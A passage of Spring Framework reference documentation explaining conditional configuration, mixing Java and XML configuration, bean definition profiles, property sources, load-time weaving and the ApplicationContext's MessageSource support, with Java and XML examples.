ctx.getBean(TransferService.class);\n\t\ttransferService.transfer(100.00, \"A123\", \"C456\");\n\t}\n----\n\nNow `ServiceConfig` is loosely coupled with respect to the concrete\n`DefaultRepositoryConfig`, and built-in IDE tooling is still useful: it will be easy for\nthe developer to get a type hierarchy of `RepositoryConfig` implementations. In this\nway, navigating `@Configuration` classes and their dependencies becomes no different\nthan the usual process of navigating interface-based code.\n--\n\n\n[[beans-java-conditional]]\n==== Conditionally include @Configuration classes or @Bean methods\n\nIt is often useful to conditionally enable or disable a complete `@Configuration` class,\nor even individual `@Bean` methods, based on some arbitrary system state. One common\nexample of this is to use the `@Profile` annotation to activate beans only when a specific\nprofile has been enabled in the Spring `Environment` (see <<beans-definition-profiles>>\nfor details).\n\nThe `@Profile` annotation is actually implemented using a much more flexible annotation\ncalled {api-spring-framework}\/context\/annotation\/Conditional.html[`@Conditional`].\nThe `@Conditional` annotation indicates specific\n`org.springframework.context.annotation.Condition` implementations that should be\nconsulted before a `@Bean` is registered.\n\nImplementations of the `Condition` interface simply provide a `matches(...)`\nmethod that returns `true` or `false`. 
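For instance, a custom condition might key off a system property; the following is a\nminimal sketch (the class, bean and property names are illustrative, not a Spring API):\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class OnFeatureFlagCondition implements Condition {\n\n\t\t@Override\n\t\tpublic boolean matches(ConditionContext context, AnnotatedTypeMetadata metadata) {\n\t\t\t\/\/ register the guarded bean only when -Dfeature.enabled=true was supplied\n\t\t\treturn \"true\".equals(context.getEnvironment().getProperty(\"feature.enabled\"));\n\t\t}\n\t}\n\n\t@Configuration\n\tpublic class FeatureConfig {\n\n\t\t@Bean\n\t\t@Conditional(OnFeatureFlagCondition.class)\n\t\tpublic FeatureService featureService() {\n\t\t\treturn new FeatureServiceImpl();\n\t\t}\n\t}\n----\n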
For example, here is the actual\n`Condition` implementation used for `@Profile`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Override\n\tpublic boolean matches(ConditionContext context, AnnotatedTypeMetadata metadata) {\n\t\tif (context.getEnvironment() != null) {\n\t\t\t\/\/ Read the @Profile annotation attributes\n\t\t\tMultiValueMap<String, Object> attrs = metadata.getAllAnnotationAttributes(Profile.class.getName());\n\t\t\tif (attrs != null) {\n\t\t\t\tfor (Object value : attrs.get(\"value\")) {\n\t\t\t\t\tif (context.getEnvironment().acceptsProfiles(((String[]) value))) {\n\t\t\t\t\t\treturn true;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\treturn false;\n\t\t\t}\n\t\t}\n\t\treturn true;\n\t}\n----\n\nSee the {api-spring-framework}\/context\/annotation\/Conditional.html[\n`@Conditional` javadocs] for more detail.\n\n[[beans-java-combining]]\n==== Combining Java and XML configuration\n\nSpring's `@Configuration` class support does not aim to be a 100% complete replacement\nfor Spring XML. Some facilities such as Spring XML namespaces remain an ideal way to\nconfigure the container. In cases where XML is convenient or necessary, you have a\nchoice: either instantiate the container in an \"XML-centric\" way using, for example,\n`ClassPathXmlApplicationContext`, or in a \"Java-centric\" fashion using\n`AnnotationConfigApplicationContext` and the `@ImportResource` annotation to import XML\nas needed.\n\n[[beans-java-combining-xml-centric]]\n===== XML-centric use of @Configuration classes\n\nIt may be preferable to bootstrap the Spring container from XML and include\n`@Configuration` classes in an ad-hoc fashion. For example, in a large existing codebase\nthat uses Spring XML, it will be easier to create `@Configuration` classes on an\nas-needed basis and include them from the existing XML files. Below you'll find the\noptions for using `@Configuration` classes in this kind of \"XML-centric\" situation.\n\n.[[beans-java-combining-xml-centric-declare-as-bean]]Declaring @Configuration classes as plain Spring `<bean\/>` elements\n--\nRemember that `@Configuration` classes are ultimately just bean definitions in the\ncontainer. In this example, we create a `@Configuration` class named `AppConfig` and\ninclude it within `system-test-config.xml` as a `<bean\/>` definition. 
Because\n`<context:annotation-config\/>` is switched on, the container will recognize the\n`@Configuration` annotation and process the `@Bean` methods declared in `AppConfig`\nproperly.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Autowired\n\t\tprivate DataSource dataSource;\n\n\t\t@Bean\n\t\tpublic AccountRepository accountRepository() {\n\t\t\treturn new JdbcAccountRepository(dataSource);\n\t\t}\n\n\t\t@Bean\n\t\tpublic TransferService transferService() {\n\t\t\treturn new TransferServiceImpl(accountRepository());\n\t\t}\n\n\t}\n----\n\n*system-test-config.xml*:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<!-- enable processing of annotations such as @Autowired and @Configuration -->\n\t\t<context:annotation-config\/>\n\t\t<context:property-placeholder location=\"classpath:\/com\/acme\/jdbc.properties\"\/>\n\n\t\t<bean class=\"com.acme.AppConfig\"\/>\n\n\t\t<bean class=\"org.springframework.jdbc.datasource.DriverManagerDataSource\">\n\t\t\t<property name=\"url\" value=\"${jdbc.url}\"\/>\n\t\t\t<property name=\"username\" value=\"${jdbc.username}\"\/>\n\t\t\t<property name=\"password\" value=\"${jdbc.password}\"\/>\n\t\t<\/bean>\n\t<\/beans>\n----\n\n*jdbc.properties*:\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\njdbc.url=jdbc:hsqldb:hsql:\/\/localhost\/xdb\njdbc.username=sa\njdbc.password=\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tApplicationContext ctx = new ClassPathXmlApplicationContext(\"classpath:\/com\/acme\/system-test-config.xml\");\n\t\tTransferService transferService = ctx.getBean(TransferService.class);\n\t\t\/\/ ...\n\t}\n----\n\n[NOTE]\n====\nIn `system-test-config.xml` above, the `AppConfig` `<bean\/>` does not declare an `id`\nelement. While it would be acceptable to do so, it is unnecessary given that no other\nbean will ever refer to it, and it is unlikely that it will be explicitly fetched from\nthe container by name. Likewise with the `DataSource` bean -- it is only ever autowired\nby type, so an explicit bean `id` is not strictly required.\n====\n--\n\n.[[beans-java-combining-xml-centric-component-scan]] Using <context:component-scan\/> to pick up `@Configuration` classes\n--\nBecause `@Configuration` is meta-annotated with `@Component`, `@Configuration`-annotated\nclasses are automatically candidates for component scanning. 
Using the same scenario as\nabove, we can redefine `system-test-config.xml` to take advantage of component-scanning.\nNote that in this case, we don't need to explicitly declare\n`<context:annotation-config\/>`, because `<context:component-scan\/>` enables the same\nfunctionality.\n\n*system-test-config.xml*:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<!-- picks up and registers AppConfig as a bean definition -->\n\t\t<context:component-scan base-package=\"com.acme\"\/>\n\t\t<context:property-placeholder location=\"classpath:\/com\/acme\/jdbc.properties\"\/>\n\n\t\t<bean class=\"org.springframework.jdbc.datasource.DriverManagerDataSource\">\n\t\t\t<property name=\"url\" value=\"${jdbc.url}\"\/>\n\t\t\t<property name=\"username\" value=\"${jdbc.username}\"\/>\n\t\t\t<property name=\"password\" value=\"${jdbc.password}\"\/>\n\t\t<\/bean>\n\t<\/beans>\n----\n--\n\n[[beans-java-combining-java-centric]]\n===== @Configuration class-centric use of XML with @ImportResource\n\nIn applications where `@Configuration` classes are the primary mechanism for configuring\nthe container, it will still likely be necessary to use at least some XML. In these\nscenarios, simply use `@ImportResource` and define only as much XML as is needed. Doing\nso achieves a \"Java-centric\" approach to configuring the container and keeps XML to a\nbare minimum.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@ImportResource(\"classpath:\/com\/acme\/properties-config.xml\")\n\tpublic class AppConfig {\n\n\t\t@Value(\"${jdbc.url}\")\n\t\tprivate String url;\n\n\t\t@Value(\"${jdbc.username}\")\n\t\tprivate String username;\n\n\t\t@Value(\"${jdbc.password}\")\n\t\tprivate String password;\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\treturn new DriverManagerDataSource(url, username, password);\n\t\t}\n\n\t}\n----\n\n*properties-config.xml*:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<context:property-placeholder location=\"classpath:\/com\/acme\/jdbc.properties\"\/>\n\t<\/beans>\n----\n\n*jdbc.properties*:\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\njdbc.url=jdbc:hsqldb:hsql:\/\/localhost\/xdb\njdbc.username=sa\njdbc.password=\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tApplicationContext ctx = new AnnotationConfigApplicationContext(AppConfig.class);\n\t\tTransferService transferService = ctx.getBean(TransferService.class);\n\t\t\/\/ ...\n\t}\n----\n\n[[beans-environment]]\n== Environment abstraction\n\nThe {api-spring-framework}\/core\/env\/Environment.html[`Environment`]\nis an abstraction integrated in the container that models two key\naspects of the application environment: <<beans-definition-profiles,_profiles_>>\nand <<beans-property-source-abstraction,_properties_>>.\n\nA _profile_ is a named, logical group of bean definitions to be registered with the\ncontainer only if the given profile is active. Beans may be assigned to a profile\nwhether defined in XML or via annotations. The role of the `Environment` object with\nrelation to profiles is in determining which profiles (if any) are currently active,\nand which profiles (if any) should be active by default.\n\nProperties play an important role in almost all applications, and may originate from\na variety of sources: properties files, JVM system properties, system environment\nvariables, JNDI, servlet context parameters, ad-hoc Properties objects, Maps, and so\non. 
The role of the `Environment` object with relation to properties is to provide the\nuser with a convenient service interface for configuring property sources and resolving\nproperties from them.\n\n[[beans-definition-profiles]]\n=== Bean definition profiles\n\nBean definition profiles provide a mechanism in the core container that allows for the\nregistration of different beans in different environments. The word _environment_\ncan mean different things to different users, and this feature can help with many\nuse cases, including:\n\n* working against an in-memory datasource in development vs. looking up that same\ndatasource from JNDI when in QA or production\n* registering monitoring infrastructure only when deploying an application into a\nperformance environment\n* registering customized implementations of beans for customer A vs. customer\nB deployments\n\nLet's consider the first use case in a practical application that requires a\n`DataSource`. In a test environment, the configuration may look like this:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Bean\n\tpublic DataSource dataSource() {\n\t\treturn new EmbeddedDatabaseBuilder()\n\t\t\t.setType(EmbeddedDatabaseType.HSQL)\n\t\t\t.addScript(\"my-schema.sql\")\n\t\t\t.addScript(\"my-test-data.sql\")\n\t\t\t.build();\n\t}\n----\n\nLet's now consider how this application will be deployed into a QA or production\nenvironment, assuming that the datasource for the application will be registered\nwith the production application server's JNDI directory. Our `dataSource` bean\nnow looks like this:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Bean(destroyMethod=\"\")\n\tpublic DataSource dataSource() throws Exception {\n\t\tContext ctx = new InitialContext();\n\t\treturn (DataSource) ctx.lookup(\"java:comp\/env\/jdbc\/datasource\");\n\t}\n----\n\nThe problem is how to switch between using these two variations based on the\ncurrent environment. Over time, Spring users have devised a number of ways to\nget this done, usually relying on a combination of system environment variables\nand XML `<import\/>` statements containing `${placeholder}` tokens that resolve\nto the correct configuration file path depending on the value of an environment\nvariable. Bean definition profiles are a core container feature that provides a\nsolution to this problem.\n\nIf we generalize the example use case above of environment-specific bean\ndefinitions, we end up with the need to register certain bean definitions in\ncertain contexts, while not in others. You could say that you want to register a\ncertain profile of bean definitions in situation A, and a different profile in\nsituation B. Let's first see how we can update our configuration to reflect\nthis need.\n\n[[beans-definition-profiles-java]]\n==== @Profile\n\nThe {api-spring-framework}\/context\/annotation\/Profile.html[`@Profile`]\nannotation allows you to indicate that a component is eligible for registration\nwhen one or more specified profiles are active. 
Using our example above, we\ncan rewrite the `dataSource` configuration as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t**@Profile(\"dev\")**\n\tpublic class StandaloneDataConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\treturn new EmbeddedDatabaseBuilder()\n\t\t\t\t.setType(EmbeddedDatabaseType.HSQL)\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/schema.sql\")\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/test-data.sql\")\n\t\t\t\t.build();\n\t\t}\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t**@Profile(\"production\")**\n\tpublic class JndiDataConfig {\n\n\t\t@Bean(destroyMethod=\"\")\n\t\tpublic DataSource dataSource() throws Exception {\n\t\t\tContext ctx = new InitialContext();\n\t\t\treturn (DataSource) ctx.lookup(\"java:comp\/env\/jdbc\/datasource\");\n\t\t}\n\t}\n----\n\n[NOTE]\n====\nAs mentioned before, with `@Bean` methods, you will typically choose to use programmatic\nJNDI lookups: either using Spring's `JndiTemplate`\/`JndiLocatorDelegate` helpers or the\nstraight JNDI `InitialContext` usage shown above, but not the `JndiObjectFactoryBean`\nvariant which would force you to declare the return type as the `FactoryBean` type.\n====\n\n`@Profile` can be used as a <<beans-meta-annotations,meta-annotation>> for the purpose\nof creating a custom _composed annotation_. The following example defines a custom\n`@Production` annotation that can be used as a drop-in replacement for\n`@Profile(\"production\")`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target(ElementType.TYPE)\n\t@Retention(RetentionPolicy.RUNTIME)\n\t**@Profile(\"production\")**\n\tpublic @interface Production {\n\t}\n----\n\n`@Profile` can also be declared at the method level to include only one particular bean\nof a configuration class:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class AppConfig {\n\n\t\t@Bean\n\t\t**@Profile(\"dev\")**\n\t\tpublic DataSource devDataSource() {\n\t\t\treturn new EmbeddedDatabaseBuilder()\n\t\t\t\t.setType(EmbeddedDatabaseType.HSQL)\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/schema.sql\")\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/test-data.sql\")\n\t\t\t\t.build();\n\t\t}\n\n\t\t@Bean\n\t\t**@Profile(\"production\")**\n\t\tpublic DataSource productionDataSource() throws Exception {\n\t\t\tContext ctx = new InitialContext();\n\t\t\treturn (DataSource) ctx.lookup(\"java:comp\/env\/jdbc\/datasource\");\n\t\t}\n\t}\n----\n\n[TIP]\n====\nIf a `@Configuration` class is marked with `@Profile`, all of the `@Bean` methods and\n`@Import` annotations associated with that class will be bypassed unless one or more of\nthe specified profiles are active. If a `@Component` or `@Configuration` class is marked\nwith `@Profile({\"p1\", \"p2\"})`, that class will not be registered\/processed unless\nprofiles 'p1' and\/or 'p2' have been activated. If a given profile is prefixed with the\nNOT operator (`!`), the annotated element will be registered if the profile is **not**\nactive. For example, given `@Profile({\"p1\", \"!p2\"})`, registration will occur if profile\n'p1' is active or if profile 'p2' is not active.\n====\n\n[[beans-definition-profiles-xml]]\n==== XML bean definition profiles\n\nThe XML counterpart is the `profile` attribute of the `<beans>` element. 
Our sample\nconfiguration above can be rewritten in two XML files as follows:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans profile=\"dev\"\n\t\txmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:jdbc=\"http:\/\/www.springframework.org\/schema\/jdbc\"\n\t\txsi:schemaLocation=\"...\">\n\n\t\t<jdbc:embedded-database id=\"dataSource\">\n\t\t\t<jdbc:script location=\"classpath:com\/bank\/config\/sql\/schema.sql\"\/>\n\t\t\t<jdbc:script location=\"classpath:com\/bank\/config\/sql\/test-data.sql\"\/>\n\t\t<\/jdbc:embedded-database>\n\t<\/beans>\n----\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans profile=\"production\"\n\t\txmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:jee=\"http:\/\/www.springframework.org\/schema\/jee\"\n\t\txsi:schemaLocation=\"...\">\n\n\t\t<jee:jndi-lookup id=\"dataSource\" jndi-name=\"java:comp\/env\/jdbc\/datasource\"\/>\n\t<\/beans>\n----\n\nIt is also possible to avoid that split and nest `<beans\/>` elements within the same file:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:jdbc=\"http:\/\/www.springframework.org\/schema\/jdbc\"\n\t\txmlns:jee=\"http:\/\/www.springframework.org\/schema\/jee\"\n\t\txsi:schemaLocation=\"...\">\n\n\t\t<!-- other bean definitions -->\n\n\t\t<beans profile=\"dev\">\n\t\t\t<jdbc:embedded-database id=\"dataSource\">\n\t\t\t\t<jdbc:script location=\"classpath:com\/bank\/config\/sql\/schema.sql\"\/>\n\t\t\t\t<jdbc:script location=\"classpath:com\/bank\/config\/sql\/test-data.sql\"\/>\n\t\t\t<\/jdbc:embedded-database>\n\t\t<\/beans>\n\n\t\t<beans profile=\"production\">\n\t\t\t<jee:jndi-lookup id=\"dataSource\" jndi-name=\"java:comp\/env\/jdbc\/datasource\"\/>\n\t\t<\/beans>\n\t<\/beans>\n----\n\nThe `spring-beans.xsd` schema has been constrained to allow such elements only as the\nlast ones in the file. This should help provide flexibility without incurring\nclutter in the XML files.\n\n[[beans-definition-profiles-enable]]\n==== Activating a profile\n\nNow that we have updated our configuration, we still need to instruct Spring which\nprofile is active. If we started our sample application right now, we would see\na `NoSuchBeanDefinitionException` thrown, because the container could not find\nthe Spring bean named `dataSource`.\n\nActivating a profile can be done in several ways, but the most straightforward is to do\nit programmatically against the `Environment` API, which is available via an\n`ApplicationContext`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tAnnotationConfigApplicationContext ctx = new AnnotationConfigApplicationContext();\n\tctx.getEnvironment().setActiveProfiles(\"dev\");\n\tctx.register(SomeConfig.class, StandaloneDataConfig.class, JndiDataConfig.class);\n\tctx.refresh();\n----\n\nIn addition, profiles may also be activated declaratively through the\n`spring.profiles.active` property, which may be specified through system environment\nvariables, JVM system properties, servlet context parameters in `web.xml`, or even as an\nentry in JNDI (see <<beans-property-source-abstraction>>). 
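For example, as a servlet context parameter, a minimal `web.xml` sketch might look like this:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<context-param>\n\t\t<param-name>spring.profiles.active<\/param-name>\n\t\t<param-value>production<\/param-value>\n\t<\/context-param>\n----\n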
In integration tests, active\nprofiles can be declared via the `@ActiveProfiles` annotation in the `spring-test` module\n(see <<testcontext-ctx-management-env-profiles>>).\n\nNote that profiles are not an \"either-or\" proposition; it is possible to activate multiple\nprofiles at once. Programmatically, simply provide multiple profile names to the\n`setActiveProfiles()` method, which accepts `String...` varargs:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tctx.getEnvironment().setActiveProfiles(\"profile1\", \"profile2\");\n----\n\nDeclaratively, `spring.profiles.active` may accept a comma-separated list of profile names:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t-Dspring.profiles.active=\"profile1,profile2\"\n----\n\n[[beans-definition-profiles-default]]\n==== Default profile\n\nThe _default_ profile represents the profile that is enabled by default. Consider the\nfollowing:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t**@Profile(\"default\")**\n\tpublic class DefaultDataConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\treturn new EmbeddedDatabaseBuilder()\n\t\t\t\t.setType(EmbeddedDatabaseType.HSQL)\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/schema.sql\")\n\t\t\t\t.build();\n\t\t}\n\t}\n----\n\nIf no profile is active, the `dataSource` above will be created; this can be\nseen as a way to provide a _default_ definition for one or more beans. If any\nprofile is enabled, the _default_ profile will not apply.\n\nThe name of the default profile can be changed using `setDefaultProfiles()` on\nthe `Environment` or declaratively using the `spring.profiles.default` property.\n\n[[beans-property-source-abstraction]]\n=== PropertySource abstraction\n\nSpring's `Environment` abstraction provides search operations over a configurable\nhierarchy of property sources. To explain fully, consider the following:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\nApplicationContext ctx = new GenericApplicationContext();\nEnvironment env = ctx.getEnvironment();\nboolean containsFoo = env.containsProperty(\"foo\");\nSystem.out.println(\"Does my environment contain the 'foo' property? \" + containsFoo);\n----\n\nIn the snippet above, we see a high-level way of asking Spring whether the `foo` property is\ndefined for the current environment. To answer this question, the `Environment` object performs\na search over a set of {api-spring-framework}\/core\/env\/PropertySource.html[`PropertySource`]\nobjects. A `PropertySource` is a simple abstraction over any source of key-value pairs, and\nSpring's {api-spring-framework}\/core\/env\/StandardEnvironment.html[`StandardEnvironment`]\nis configured with two PropertySource objects -- one representing the set of JVM system properties\n(_a la_ `System.getProperties()`) and one representing the set of system environment variables\n(_a la_ `System.getenv()`).\n\n[NOTE]\n====\nThese default property sources are present for `StandardEnvironment`, for use in standalone\napplications. {api-spring-framework}\/web\/context\/support\/StandardServletEnvironment.html[`StandardServletEnvironment`]\nis populated with additional default property sources including servlet config and servlet\ncontext parameters. 
It can optionally enable a {api-spring-framework}\/jndi\/JndiPropertySource.html[`JndiPropertySource`].\nSee the javadocs for details.\n====\n\nConcretely, when using the `StandardEnvironment`, the call to `env.containsProperty(\"foo\")`\nwill return true if a `foo` system property or `foo` environment variable is present at\nruntime.\n\n[TIP]\n====\nThe search performed is hierarchical. By default, system properties have precedence over\nenvironment variables, so if the `foo` property happens to be set in both places during\na call to `env.getProperty(\"foo\")`, the system property value will 'win' and be returned\npreferentially over the environment variable. Note that property values will not get merged\nbut rather completely overridden by a preceding entry.\n\nFor a common `StandardServletEnvironment`, the full hierarchy looks as follows, with the\nhighest-precedence entries at the top:\n\n* ServletConfig parameters (if applicable, e.g. in case of a `DispatcherServlet` context)\n* ServletContext parameters (web.xml context-param entries)\n* JNDI environment variables (\"java:comp\/env\/\" entries)\n* JVM system properties (\"-D\" command-line arguments)\n* JVM system environment (operating system environment variables)\n====\n\nMost importantly, the entire mechanism is configurable. Perhaps you have a custom source\nof properties that you'd like to integrate into this search. No problem -- simply implement\nand instantiate your own `PropertySource` and add it to the set of `PropertySources` for the\ncurrent `Environment`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\nConfigurableApplicationContext ctx = new GenericApplicationContext();\nMutablePropertySources sources = ctx.getEnvironment().getPropertySources();\nsources.addFirst(new MyPropertySource());\n----\n\nIn the code above, `MyPropertySource` has been added with highest precedence in the\nsearch. If it contains a `foo` property, it will be detected and returned ahead of\nany `foo` property in any other `PropertySource`. The\n{api-spring-framework}\/core\/env\/MutablePropertySources.html[`MutablePropertySources`]\nAPI exposes a number of methods that allow for precise manipulation of the set of\nproperty sources.\n\n=== @PropertySource\n\nThe {api-spring-framework}\/context\/annotation\/PropertySource.html[`@PropertySource`]\nannotation provides a convenient and declarative mechanism for adding a `PropertySource`\nto Spring's `Environment`.\n\nGiven a file \"app.properties\" containing the key\/value pair `testbean.name=myTestBean`,\nthe following `@Configuration` class uses `@PropertySource` in such a way that\na call to `testBean.getName()` will return \"myTestBean\".\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n @Configuration\n **@PropertySource(\"classpath:\/com\/myco\/app.properties\")**\n public class AppConfig {\n\t @Autowired\n\t Environment env;\n\n\t @Bean\n\t public TestBean testBean() {\n\t\t TestBean testBean = new TestBean();\n\t\t testBean.setName(env.getProperty(\"testbean.name\"));\n\t\t return testBean;\n\t }\n }\n----\n\nAny `${...}` placeholders present in a `@PropertySource` resource location will\nbe resolved against the set of property sources already registered against the\nenvironment. 
For example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n @Configuration\n @PropertySource(\"classpath:\/com\/${my.placeholder:default\/path}\/app.properties\")\n public class AppConfig {\n\t @Autowired\n\t Environment env;\n\n\t @Bean\n\t public TestBean testBean() {\n\t\t TestBean testBean = new TestBean();\n\t\t testBean.setName(env.getProperty(\"testbean.name\"));\n\t\t return testBean;\n\t }\n }\n----\n\nAssuming that \"my.placeholder\" is present in one of the property sources already\nregistered, e.g. system properties or environment variables, the placeholder will\nbe resolved to the corresponding value. If not, then \"default\/path\" will be used\nas a default. If no default is specified and a property cannot be resolved, an\n`IllegalArgumentException` will be thrown.\n\n\n=== Placeholder resolution in statements\n\nHistorically, the value of placeholders in XML elements could be resolved only against\nJVM system properties or environment variables. This is no longer the case. Because\nthe Environment abstraction is integrated throughout the container, it's easy to\nroute resolution of placeholders through it. This means that you may configure the\nresolution process in any way you like: change the precedence of searching through\nsystem properties and environment variables, or remove them entirely; add your\nown property sources to the mix as appropriate.\n\nConcretely, the following statement works regardless of where the `customer`\nproperty is defined, as long as it is available in the `Environment`:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<import resource=\"com\/bank\/service\/${customer}-config.xml\"\/>\n\t<\/beans>\n----\n\n\n[[context-load-time-weaver]]\n== Registering a LoadTimeWeaver\n\nThe `LoadTimeWeaver` is used by Spring to dynamically transform classes as they are\nloaded into the Java virtual machine (JVM).\n\nTo enable load-time weaving, add the `@EnableLoadTimeWeaving` annotation to one of your\n`@Configuration` classes:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@EnableLoadTimeWeaving\n\tpublic class AppConfig {\n\n\t}\n----\n\nAlternatively, for XML configuration, use the `context:load-time-weaver` element:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<context:load-time-weaver\/>\n\t<\/beans>\n----\n\nOnce configured for the `ApplicationContext`, any bean within that `ApplicationContext`\nmay implement `LoadTimeWeaverAware`, thereby receiving a reference to the load-time\nweaver instance. This is particularly useful in combination with <<orm-jpa,Spring's JPA\nsupport>> where load-time weaving may be necessary for JPA class transformation. Consult\nthe `LocalContainerEntityManagerFactoryBean` javadocs for more detail. For more on\nAspectJ load-time weaving, see <<aop-aj-ltw>>.\n\n\n\n\n[[context-introduction]]\n== Additional Capabilities of the ApplicationContext\n\nAs was discussed in the chapter introduction, the `org.springframework.beans.factory`\npackage provides basic functionality for managing and manipulating beans, including in a\nprogrammatic way. The `org.springframework.context` package adds the\n{api-spring-framework}\/context\/ApplicationContext.html[`ApplicationContext`]\ninterface, which extends the `BeanFactory` interface, in addition to extending other\ninterfaces to provide additional functionality in a more __application\nframework-oriented style__. 
This mechanism is particularly useful in combination with <<orm-jpa,Spring's JPA\nsupport>> where load-time weaving may be necessary for JPA class transformation. Consult\nthe `LocalContainerEntityManagerFactoryBean` javadocs for more detail. For more on\nAspectJ load-time weaving, see <<aop-aj-ltw>>.\n\n\n\n\n[[context-introduction]]\n== Additional Capabilities of the ApplicationContext\n\nAs was discussed in the chapter introduction, the `org.springframework.beans.factory`\npackage provides basic functionality for managing and manipulating beans, including in a\nprogrammatic way. The `org.springframework.context` package adds the\n{api-spring-framework}\/context\/ApplicationContext.html[`ApplicationContext`]\ninterface, which extends the `BeanFactory` interface, in addition to extending other\ninterfaces to provide additional functionality in a more __application\nframework-oriented style__. Many people use the `ApplicationContext` in a completely\ndeclarative fashion, not even creating it programmatically, but instead relying on\nsupport classes such as `ContextLoader` to automatically instantiate an\n`ApplicationContext` as part of the normal startup process of a Java EE web application.\n\nTo enhance `BeanFactory` functionality in a more framework-oriented style, the context\npackage also provides the following functionality:\n\n* __Access to messages in i18n-style__, through the `MessageSource` interface.\n* __Access to resources__, such as URLs and files, through the `ResourceLoader` interface.\n* __Event publication__, namely to beans implementing the `ApplicationListener` interface,\n through the use of the `ApplicationEventPublisher` interface.\n* __Loading of multiple (hierarchical) contexts__, allowing each to be focused on one\n particular layer, such as the web layer of an application, through the\n `HierarchicalBeanFactory` interface.\n\n\n\n[[context-functionality-messagesource]]\n=== Internationalization using MessageSource\n\nThe `ApplicationContext` interface extends an interface called `MessageSource`, and\ntherefore provides internationalization (i18n) functionality. Spring also provides the\ninterface `HierarchicalMessageSource`, which can resolve messages hierarchically.\nTogether these interfaces provide the foundation upon which Spring effects message\nresolution. The methods defined on these interfaces include:\n\n* `String getMessage(String code, Object[] args, String defaultMessage, Locale locale)`:\n The basic method used to retrieve a message from the `MessageSource`. When no message\n is found for the specified locale, the default message is used. Any arguments passed\n in become replacement values, using the `MessageFormat` functionality provided by the\n standard library.\n* `String getMessage(String code, Object[] args, Locale locale)`: Essentially the same as\n the previous method, but with one difference: no default message can be specified; if\n the message cannot be found, a `NoSuchMessageException` is thrown.\n* `String getMessage(MessageSourceResolvable resolvable, Locale locale)`: All properties\n used in the preceding methods are also wrapped in a class named\n `MessageSourceResolvable`, which you can use with this method.\n\nWhen an `ApplicationContext` is loaded, it automatically searches for a `MessageSource`\nbean defined in the context. The bean must have the name `messageSource`. If such a bean\nis found, all calls to the preceding methods are delegated to the message source. If no\nmessage source is found, the `ApplicationContext` attempts to find a parent containing a\nbean with the same name. If it does, it uses that bean as the `MessageSource`. If the\n`ApplicationContext` cannot find any source for messages, an empty\n`DelegatingMessageSource` is instantiated in order to be able to accept calls to the\nmethods defined above.\n\nSpring provides two `MessageSource` implementations, `ResourceBundleMessageSource` and\n`StaticMessageSource`. Both implement `HierarchicalMessageSource` in order to do nested\nmessaging. The `StaticMessageSource` is rarely used but provides programmatic ways to\nadd messages to the source.\n\n
